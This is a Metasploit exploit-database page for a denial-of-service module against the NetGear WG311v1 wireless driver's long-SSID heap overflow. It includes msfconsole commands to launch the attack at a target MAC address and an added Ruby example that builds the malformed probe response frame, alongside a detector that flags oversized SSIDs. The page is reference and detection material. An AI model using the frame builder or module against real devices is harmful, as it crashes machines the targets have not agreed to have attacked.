NetGear WG311v1 Wireless Driver Long SSID Overflow | Metasploit Exploit Database (DB)

NetGear WG311v1 Wireless Driver Long SSID Overflow

This module exploits a buffer overflow in the NetGear WG311v1 wireless device driver under Windows XP and 2000. A kernel-mode heap overflow occurs when a malformed probe response frame containing a long SSID field is received (the 802.11 SSID information element carries a one-byte length, so a frame can declare up to 255 SSID bytes where a conforming SSID is at most 32). This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI card. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
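
The following is an added example, not the module's own code and not taken from the Metasploit source. It builds, as a byte string only, a probe response frame whose SSID information element is far longer than the 32-byte maximum (the condition the description above says the driver mishandles), and it walks the tagged parameters of a received frame to flag such an oversized SSID, which is the check a monitor or parser would want. The frame layout is the standard 802.11 management header plus the probe response fixed fields; the MAC addresses and SSIDs are constructed sample values, and nothing is transmitted (the real module injects the frame through Lorcon2). The driver's internal buffer layout is not described on the page and is not modelled here.

```ruby
# Added example (not the Metasploit module's code): build an 802.11 probe
# response with an oversized SSID IE and detect such frames. Byte strings only,
# nothing is sent on the air. Sample MACs/SSIDs below are constructed values.

SSID_MAX_LEN = 32  # IEEE 802.11 limit; a conforming SSID IE never exceeds this

# Convert "aa:bb:cc:dd:ee:ff" to six raw bytes.
def mac_to_bytes(mac)
  mac.split(':').map { |h| h.to_i(16) }.pack('C6')
end

# Build a probe response (management type 0, subtype 5) carrying the given SSID.
# The IE length field is one byte, so the SSID can be at most 255 bytes, which is
# still about eight times the 32-byte limit a driver might size its buffer for.
def build_probe_response(dst:, src:, ssid:, seq: 0)
  raise ArgumentError, 'SSID IE cannot exceed 255 bytes' if ssid.bytesize > 255
  frame  = [0x50, 0x00].pack('C2')            # frame control: mgmt / probe response
  frame << [0x0000].pack('v')                 # duration
  frame << mac_to_bytes(dst)                  # addr1: destination (target station)
  frame << mac_to_bytes(src)                  # addr2: source (fake access point)
  frame << mac_to_bytes(src)                  # addr3: BSSID
  frame << [(seq & 0x0fff) << 4].pack('v')    # sequence control (fragment 0)
  frame << [0].pack('Q<')                     # timestamp (8 bytes)
  frame << [100].pack('v')                    # beacon interval
  frame << [0x0001].pack('v')                 # capability info: ESS
  frame << [0, ssid.bytesize].pack('C2') << ssid        # SSID IE (tag 0)
  frame << [1, 4, 0x82, 0x84, 0x8b, 0x96].pack('C6')    # supported rates IE
  frame << [3, 1, 11].pack('C3')                        # DS parameter set IE: channel 11
  frame
end

# Walk the tagged parameters of a management frame and return the declared SSID IE
# length, or nil if no SSID IE is present. Tagged parameters start at offset 36:
# 24 bytes of header plus 12 bytes of probe response fixed fields.
def ssid_ie_length(frame)
  pos = 36
  while pos + 2 <= frame.bytesize
    tag, len = frame.byteslice(pos, 2).unpack('C2')
    return len if tag == 0
    pos += 2 + len
  end
  nil
end

# Detection check: a probe response whose SSID IE declares more than 32 bytes is
# malformed and should be flagged before any driver or parser copies it.
def oversized_ssid?(frame)
  len = ssid_ie_length(frame)
  !len.nil? && len > SSID_MAX_LEN
end

if __FILE__ == $0
  target = '00:11:22:33:44:55'   # constructed target MAC
  fake_ap = '00:0f:b5:aa:bb:cc'  # constructed AP MAC
  benign = build_probe_response(dst: target, src: fake_ap, ssid: 'lab')
  evil   = build_probe_response(dst: target, src: fake_ap, ssid: 'A' * 255)
  puts "benign: SSID IE length=#{ssid_ie_length(benign)} flagged=#{oversized_ssid?(benign)}"
  puts "malformed: SSID IE length=#{ssid_ie_length(evil)} flagged=#{oversized_ssid?(evil)}"
end
```

The parser deliberately trusts the declared length only for stepping to the next element and bounds every read against the frame size; the oversized SSID is reported from the length byte rather than copied anywhere, which is the distinction between the detector and the vulnerable driver.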

Rank

  • Normal

Authors

  • Laurent Butti <0x9090 [at] gmail.com>

Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/dos/wifi/netgear_wg311pci
msf auxiliary(netgear_wg311pci) > set ADDR_DST [STRING]
msf auxiliary(netgear_wg311pci) > run


Module Options

ADDR_DST   The MAC address of the target system
CHANNEL    The initial channel (default: 11)
DRIVER     The name of the wireless driver for lorcon (default: autodetect)
INTERFACE  The name of the wireless interface (default: wlan0)
RUNTIME    The number of seconds to run the attack (default: 60)
VERBOSE    Enable detailed status messages
WORKSPACE  Specify the workspace for this module